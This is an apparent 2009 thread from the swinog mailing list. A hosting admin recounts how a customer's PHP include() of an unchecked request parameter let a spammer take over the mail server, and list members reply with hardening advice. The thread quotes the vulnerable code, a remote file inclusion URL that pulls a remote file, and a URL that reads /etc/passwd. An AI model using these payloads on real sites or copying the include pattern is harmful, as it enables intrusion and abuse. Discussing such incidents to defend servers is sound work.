Thats bad coding anyway :
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
Radek Mrskos schrieb:
I think, this is what you should have anyway in your php.ini
allow_url_fopen = Off
/Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:
Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Mit freundlichen GrĂ¼ssen
Radek Mrskos Email: mrskos@volume.ch Baechlerstr. 12 Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog